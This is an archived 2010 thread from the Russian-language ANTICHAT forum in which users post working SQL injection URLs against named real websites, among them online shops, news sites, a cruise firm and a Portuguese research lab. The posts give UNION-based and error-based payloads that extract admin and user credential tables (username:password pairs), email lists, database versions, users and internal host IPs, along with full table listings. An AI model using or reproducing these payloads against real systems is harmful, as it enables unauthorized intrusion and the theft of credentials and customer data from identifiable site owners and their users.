ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #12111  
Старый 11.05.2010, 19:59
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

5.0.90-community
Код:
http://chaithanya.org/php/readmore.php?id=-5+union+select+1,version(),group_concat(0x0b,column_name),4,5,6,7,8,9+from+information_schema.columns+where+table_name=0x757365726C6F67696E+--
table: userlogin::userid,username,userpassword,usertype,userstatus

and
Код:
http://chaithanya.org/php/readmore.php?id=-5+union+select+1,2,group_concat(0x0b,username,0x3a,userpassword),4,5,6,7,8,9+from+userlogin+--

Последний раз редактировалось Bb0y; 11.05.2010 в 20:21..
 
Ответить с цитированием

  #12112  
Старый 11.05.2010, 20:12
X-FRITS
Познающий
Регистрация: 24.06.2007
Сообщений: 84
Провел на форуме:
1348653

Репутация: 192
Отправить сообщение для X-FRITS с помощью ICQ
По умолчанию

пр2

Код:
http://davigames.com/games.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--
пр2 тиц10
Код:
http://gsm-sprut.com/n.php?nid=-1+union+select+1,2,3,4,5,6--
 
Ответить с цитированием

  #12113  
Старый 11.05.2010, 20:55
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.hdmi.hr/stc2007/index.php?id=-3+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database(),@@version_compile_os),6,7,8,9,10,1 1,12,13+from+admin--

http://www.oceanmore.hr/knjiga.php?id_knjiga=-62+union+select+1,concat_ws(0x3a,user(),version(), database()),3,4,5,6,7,8

Последний раз редактировалось Konqi; 11.05.2010 в 21:05..
 
Ответить с цитированием

  #12114  
Старый 11.05.2010, 22:47
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.netcurtainsdirect.com
ТИЦ: 10
PR: 2
Примеры запросов:
Код:
http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88+from+information_schema.tables--+  

http://www.netcurtainsdirect.com/item2.php?id=-316'+union+select+1,2,3,group_concat(0x0b,column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88+from+information_schema.columns+where+table_name='phpbb_users'--+
version - 5.0.67
user - netcurtains@localhost
database - netcurtainsdirect_com_-_cnets
os - redhat-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
accessories,   
bargains,   
cafe,   
cart,   
customers,   
customers_optimal,   
defaults,   
delivery,   
deyron,   
email_list,   
faq,   
howhear,   
inspiration,   
invoice,   
linedvoile_panels,   
nets,   
optimal_errors,   
orderlines,   
orderlines_opt,   
orders,   
orders_opt,   
orders_web,   
other,   
payments,   
product_options,   
products,   
products2,   
strings,   
tablecloths,   
test_customers,   
test_orderlines,   
test_orders,   
test_payments,   
testimonials,   
tiebacks,   
typedesc,   
typedesc_old,   
voile,   
voilecurtains,   
voilepanels,   
phpbb_auth_access,   
phpbb_banlist,   
phpbb_categories,   
phpbb_config,   
phpbb_confirm,   
phpbb_disallow,   
phpbb_forum_prune,   
phpbb_forums,   
phpbb_groups,   
phpbb_posts,   
phpbb_posts_text,   
phpbb_privmsgs,   
phpbb_privmsgs_text,   
phpbb_ranks,   
phpbb_search_results,   
phpbb_search_wordlist,   
phpbb_search_wordmatch,   
phpbb_sessio
 
Ответить с цитированием

  #12115  
Старый 12.05.2010, 10:14
Snap
Познающий
Регистрация: 05.02.2007
Сообщений: 71
Провел на форуме:
423288

Репутация: 82
Отправить сообщение для Snap с помощью ICQ
По умолчанию

ЦЕНТР СТРАТЕГІЧНИХ ІНІЦІАТИВ

Цитата:
http://www.csi.km.ua/news.php?page=1&new=-43+union+select+1,2,3,4,concat(table_schema,char(5 8),table_name),6,7,8,9,10,11+from+information_sche ma.columns--
 
Ответить с цитированием

  #12116  
Старый 12.05.2010, 12:21
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://www.princesscruises.com.do/destinos/index.php?id=-2+union+select+1,aes_decrypt(aes_encrypt(concat(us er,char(58),pass),1),1)+from+admin

http://sips.inesc-id.pt/projects.php?id=-15+union+select+1,version(),user(),database(),@@ve rsion_compile_os,6,7,8,9,10,11,12-- (PR-5)

http://www.universal.pt/main.php?id=-69+union+select+1,2,concat(username,char(58),passw ord),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20, 21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 ,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,5 4,55,56,57,58,59,60+from+_tusers+limit+0,1-- [PR-5]

Последний раз редактировалось Konqi; 12.05.2010 в 15:03..
 
Ответить с цитированием

  #12117  
Старый 12.05.2010, 15:10
aka_zver
Постоянный
Регистрация: 17.09.2009
Сообщений: 775
Провел на форуме:
3132379

Репутация: 1069


Отправить сообщение для aka_zver с помощью ICQ Отправить сообщение для aka_zver с помощью AIM Отправить сообщение для aka_zver с помощью MSN Отправить сообщение для aka_zver с помощью Yahoo
По умолчанию

Сайт: http://www.retromoderndesign.com
ТИЦ: 10
PR: 3
Пример запроса:
Код:
http://www.retromoderndesign.com/sold.php?id=-7+union+select+1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,group_concat(0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables--+
version - 5.0.90-log
user - d1479@194.236.32.155
database - d1479
os - pc-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
retromoderndesign_artikel,   
retromoderndesign_artikel_betyg,   
retromoderndesign_conversi cm
==========================================


Сайт: http://www.malloves.com
ТИЦ: 0
PR: 3
Примеры запросов:
Код:
http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,username,0x3a,password),5,6,7,8,9,10,11,12+from+go_users--+

http://www.malloves.com/item2.php?id=266'+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,group_concat(0x0b,email),5,6,7,8,9,10,11,12+from+go_email_list--+
version - 5.0.77
user - malloves@localhost
database - malloves
os - redhat-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
CoverPhotos,   
Inventory,   
Materials,   
go_access_levels,   
go_content,   
go_content_types,   
go_current_special_categorys,   
go_current_special_categorys2,
go_current_special_categorys3,   
go_current_specials,   
go_current_specials2,   
go_current_specials3,   
go_email_list,   
go_email_list_status,   
go_misc,   
go_modules,   
go_online_inquiries,   
go_press,   
go_press_categories,   
go_press_categories_join,   
go_testimonials,   
go_users
==========================================

Сайт: http://www.pony1997.com
ТИЦ: 0
PR: 2
Пример запроса:
Код:
http://www.pony1997.com/item2.php?id=4&tbl=catitems2&stl=cast((SELECT+version()||chr(58)||current_user||chr(58)||current_database())+as+int)--
version - PostgreSQL 8.1.4 on i386-portbld-freebsd6.1, compiled by GCC cc (GCC) 3.4.4 [FreeBSD] 20050518
user - gt108043
database - gt108043
os - i386-portbld-freebsd6.1

==========================================

Сайт: http://www.listentoaudioproshop.com
ТИЦ: 0
PR: 0
Пример запроса:
Код:
http://www.listentoaudioproshop.com/item3.php?id=53+union+select+1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,4,5,6,7,8,9,group_concat(0x0b,username,0x3a,password)+from+proshop_login--+
version - 5.0.67
user - tookd_kwan@localhost
database - tookd_kwan
os - pc-linux-gnu
tables:

Код:
CHARACTER_SETS,   
COLLATIONS,   
COLLATION_CHARACTER_SET_APPLICABILITY,   
COLUMNS,   
COLUMN_PRIVILEGES,   
KEY_COLUMN_USAGE,   
PROFILING,   
ROUTINES,   
SCHEMATA,   
SCHEMA_PRIVILEGES,   
STATISTICS,   
TABLES,   
TABLE_CONSTRAINTS,   
TABLE_PRIVILEGES,   
TRIGGERS,   
USER_PRIVILEGES,   
VIEWS,   
proshop_category,   
proshop_detail,   
proshop_filter,   
proshop_filteritem,   
proshop_headitem,   
proshop_login
==========================================

Сайт: http://www.concretorecs.com
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.concretorecs.com/store/item3.php?id=-2789+union+select+1,2,3,4,5,6,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),8,9--+
version - 4.1.22-standard-log
user - concreto_concret@localhost
database - concreto_concreto
os - pc-linux-gnu

==========================================

Сайт: http://www.newsnetwork-bd.com
ТИЦ: 0
PR: 3
Пример запроса:
Код:
http://www.newsnetwork-bd.com/UI/Public/Common.php?ID=1+or+(select+count(*)+from+(select+1+union+select+2+union+select+3)x+group+by+concat(mid(concat_ws(0x0b,version(),user(),database(),@@version_compile_os),+1,+70),+floor(rand(0)*2)))--+
version - 4.1.22-max-log
user - newsnet1@68.178.254.199
database - newsnet1
os - unknown-linux-gnu

Последний раз редактировалось aka_zver; 12.05.2010 в 18:09..
 
Ответить с цитированием

  #12118  
Старый 12.05.2010, 15:51
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

http://www.festivaltv.ru/bratina/honor/index.php?id=-16+union+select+1,2,version()+--+
version: 5.0.45
filepriv=no;
 
Ответить с цитированием

  #12119  
Старый 12.05.2010, 18:29
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


Отправить сообщение для Konqi с помощью ICQ
По умолчанию

http://rascunho.iol.pt/pagina.php?id=-5+union+select+1,concat_ws(user(),version(),databa se(),@@version_compile_os),3,4,5,6

PR=6
 
Ответить с цитированием

  #12120  
Старый 12.05.2010, 19:48
av1
Участник форума
Регистрация: 06.10.2008
Сообщений: 165
Провел на форуме:
355997

Репутация: 66
Отправить сообщение для av1 с помощью ICQ
По умолчанию

Код:
http://en.fondsk.ru/article.php?id=-2845+UNION+SELECT+1,2,3,4,5,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--
User: u32888@10.10.10.224
Version: 5.0.67-log
Database: u32888

Google PR: 4
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ